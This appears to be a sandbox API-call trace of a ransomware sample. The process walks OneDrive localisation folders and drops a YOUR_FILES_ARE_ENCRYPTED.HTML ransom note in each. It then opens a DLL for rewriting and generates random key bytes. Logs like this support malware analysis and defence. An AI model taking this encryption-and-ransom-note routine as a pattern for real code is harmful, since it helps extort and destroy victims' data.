ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x44031086, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.016] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.016] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.016] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.017] lstrlenW (lpString=".mui") returned 4 [0114.017] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.017] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x431bcd83, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x431bcd83, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x44031086, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.017] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0114.017] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.017] GetProcessHeap () returned 0x600000 [0114.017] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.018] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\uk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.018] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.019] CloseHandle (hObject=0x334) returned 1 [0114.020] GetProcessHeap () returned 0x600000 [0114.020] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.020] GetProcessHeap () returned 0x600000 [0114.020] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.020] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4451bff5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4451bff5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4451bff5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ur", cAlternateFileName="")) returned 1 [0114.020] StrStrIW (lpFirst="ur", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.020] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur") returned 78 [0114.020] GetProcessHeap () returned 0x600000 [0114.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.020] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur" [0114.020] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\*" [0114.020] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4451bff5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4451bff5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x44fb0692, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0114.021] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4451bff5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4451bff5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x44fb0692, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.021] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44fb0692, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x44fb0692, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45d3fb83, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.021] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.021] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.021] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.021] lstrlenW (lpString=".mui") returned 4 [0114.021] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.021] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44fb0692, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x44fb0692, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x45d3fb83, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.021] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0114.021] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.021] GetProcessHeap () returned 0x600000 [0114.021] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ur\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ur\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.022] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.023] CloseHandle (hObject=0x334) returned 1 [0114.023] GetProcessHeap () returned 0x600000 [0114.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.023] GetProcessHeap () returned 0x600000 [0114.023] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.023] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4622a987, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4622a987, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x4622a987, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="uz-latn-uz", cAlternateFileName="UZ-LAT~1")) returned 1 [0114.023] StrStrIW (lpFirst="uz-latn-uz", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.023] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz") returned 86 [0114.023] GetProcessHeap () returned 0x600000 [0114.023] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.024] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz" [0114.024] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\*" [0114.024] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4622a987, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4622a987, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47006399, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4622a987, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x4622a987, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47006399, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.024] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47006399, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47006399, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47373ad9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x166c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.024] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.024] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\FileSync.LocalizedResources.dll.mui") returned 122 [0114.024] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.025] lstrlenW (lpString=".mui") returned 4 [0114.025] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.025] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47006399, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47006399, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47373ad9, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x166c0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.025] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.025] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0114.025] GetProcessHeap () returned 0x600000 [0114.025] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.025] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\uz-latn-uz\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\uz-latn-uz\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.026] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.027] CloseHandle (hObject=0x334) returned 1 [0114.028] GetProcessHeap () returned 0x600000 [0114.028] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.028] GetProcessHeap () returned 0x600000 [0114.028] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.029] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47589b40, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47589b40, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47589b40, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="vi", cAlternateFileName="")) returned 1 [0114.029] StrStrIW (lpFirst="vi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.029] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi") returned 78 [0114.029] GetProcessHeap () returned 0x600000 [0114.029] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.030] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi" [0114.030] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\*" [0114.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47589b40, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47589b40, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x479435d4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0114.031] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47589b40, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47589b40, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x479435d4, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="..", cAlternateFileName="")) returned 1 [0114.031] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x479435d4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x479435d4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x48496726, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0114.031] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.031] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\FileSync.LocalizedResources.dll.mui") returned 114 [0114.031] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.031] lstrlenW (lpString=".mui") returned 4 [0114.031] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0114.032] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x479435d4, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x479435d4, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x48496726, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ec0, dwReserved0=0x19e010, dwReserved1=0x724ead, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0114.032] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0114.032] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0114.033] GetProcessHeap () returned 0x600000 [0114.033] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0114.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\vi\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\vi\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0114.034] WriteFile (in: hFile=0x334, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0114.036] CloseHandle (hObject=0x334) returned 1 [0114.036] GetProcessHeap () returned 0x600000 [0114.036] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0114.036] GetProcessHeap () returned 0x600000 [0114.036] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0114.037] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328ec16f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x328ec16f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x33af3cb5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x632c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="VideoStreamingPlugin.dll", cAlternateFileName="VIDEOS~1.DLL")) returned 1 [0114.038] StrStrIW (lpFirst="VideoStreamingPlugin.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.038] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll") returned 100 [0114.038] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0114.038] lstrlenW (lpString=".dll") returned 4 [0114.038] PathFindExtensionW (pszPath="VideoStreamingPlugin.dll") returned=".dll" [0114.038] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0114.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\VideoStreamingPlugin.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\videostreamingplugin.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0114.039] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=406208) returned 1 [0114.039] GetProcessHeap () returned 0x600000 [0114.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0114.042] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="FC") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="24") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="AD") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="EB") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="18") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="0A") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="BB") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="DD") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="43") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="EC") returned 2 [0114.042] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="BA") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="53") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="C9") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="6A") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="42") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="93") returned 2 [0114.043] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D2") returned 2 